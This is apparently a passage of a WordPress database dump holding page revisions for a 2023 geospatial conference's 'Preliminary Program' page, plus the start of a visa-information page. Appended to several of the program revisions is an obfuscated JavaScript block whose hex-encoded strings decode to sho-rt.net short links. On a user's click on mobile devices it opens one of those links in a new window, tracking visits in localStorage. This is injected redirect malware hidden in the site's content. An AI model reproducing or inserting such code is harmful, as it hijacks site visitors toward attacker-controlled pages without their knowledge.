_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Preliminary Program','','publish','closed','closed','','preliminary-program','','','2023-08-01 05:56:49','2023-08-01 05:56:49','',0,'https://gsw2023.com/?page_id=2669',0,'page','',0),
(2671,1,'2022-10-09 01:58:55','2022-10-09 01:58:55','','Program','','inherit','closed','closed','','2669-revision-v1','','','2022-10-09 01:58:55','2022-10-09 01:58:55','',2669,'https://gsw2023.com/?p=2671',0,'revision','',0),
(2672,1,'2022-10-09 02:01:31','2022-10-09 02:01:31','','program','','inherit','open','closed','','program-2','','','2022-10-09 02:01:31','2022-10-09 02:01:31','',2669,'https://gsw2023.com/wp-content/uploads/2022/10/program.jpg',0,'attachment','image/jpeg',0),
(2673,1,'2022-10-09 02:10:35','2022-10-09 02:10:35','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: left;\">Preliminary Program</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2672\" img_size=\"1224x511\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<style>\n			.gap-10 {<br />				width:100%;<br />				height:20px;<br />			}<br />			.gap-50 {<br />				width:100%;<br />				height:50px;<br />			}<br />			.gap-100 {<br />				width:100%;<br />				height:130px;<br />			}<br />		</style>\n<div class=\"gap-10\"></div>\n<h4 style=\"color: red;\">Tutorials</h4>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li>\n<h6><strong>The GSW2023 will offer at least 4 tutorials on September 2, 2023. The tutorials will cover the state of the art and future trends in the Geospatial technologies and applications. The tutorial program will be announced soon.</strong></h6>\n</li>\n</ul>\n</li>\n</ul>\n<div class=\"gap-50\"></div>\n<h4 style=\"color: red;\">Instruction for Oral Presentations</h4>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li>\n<h6><strong>More instructions will be announced once the program in complete in May 2023.</strong></h6>\n</li>\n</ul>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Program','','inherit','closed','closed','','2669-revision-v1','','','2022-10-09 02:10:35','2022-10-09 02:10:35','',2669,'https://gsw2023.com/?p=2673',0,'revision','',0),
(2674,1,'2022-10-09 02:28:26','2022-10-09 02:28:26','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: left;\">Preliminary Program</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2672\" img_size=\"1224x511\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<style>\n			.gap-10 {<br />				width:100%;<br />				height:20px;<br />			}<br />			.gap-50 {<br />				width:100%;<br />				height:50px;<br />			}<br />			.gap-100 {<br />				width:100%;<br />				height:130px;<br />			}<br />		</style>\n<div class=\"gap-10\"></div>\n<h4 style=\"color: red;\">Tutorials</h4>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li>\n<h6><strong>The GSW2023 will offer at least 4 tutorials on September 2, 2023. The tutorials will cover the state of the art and future trends in the Geospatial technologies and applications. The tutorial program will be announced soon.</strong></h6>\n</li>\n</ul>\n</li>\n</ul>\n<div class=\"gap-50\"></div>\n<h4 style=\"color: red;\">Instruction for Oral Presentations</h4>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li>\n<h6><strong>More instructions will be announced once the program in complete in May 2023.</strong></h6>\n</li>\n</ul>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][ultimate_info_table][/ultimate_info_table][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Program','','inherit','closed','closed','','2669-revision-v1','','','2022-10-09 02:28:26','2022-10-09 02:28:26','',2669,'https://gsw2023.com/?p=2674',0,'revision','',0),
(2675,1,'2022-10-09 02:29:25','2022-10-09 02:29:25','<p>[vc_row][vc_column][vc_column_text]</p>\n<p style=\"font-weight: 400;\"><strong>Entry Visa:</strong></p>\n<ul style=\"font-weight: 400;\">\n<li>For participants requiring visa invitation letters, please use the link below :</li>\n</ul>\n<p style=\"font-weight: 400;\"><span style=\"color: #808080;\"><strong><a style=\"color: #808080;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">https://visa.gsw2023.com</a></strong></span>.  You will receive an invitation letter automatically once you provide your name (as it appears in your passport), passport number and nationality.</p>\n<ul style=\"font-weight: 400;\">\n<li>If you require specific format for the Visa Letter, please Send email to <strong><span style=\"color: #808080;\"><a style=\"color: #808080;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span></strong> to edit/add the text of the letter.</li>\n</ul>\n<p>&nbsp;</p>\n<ul style=\"font-weight: 400;\">\n<li>For most nationalities, reciving a visa for Egypt can be done on arrival at Cairo International Airport or online via the Egyptian Government\'s official e-visa portal <span style=\"color: #808080;\"><strong>(<a style=\"color: #808080;\" href=\"https://visa2egypt.gov.eg/eVisa/Home?VISTK=OA4K-0JST-POSC-FLL7-FEVD-OUJ5-QIZH-78YZ-GYQ9-9IQQ-K5BB-E03R-EOBW-KVT6-S9CK-X3W9\" 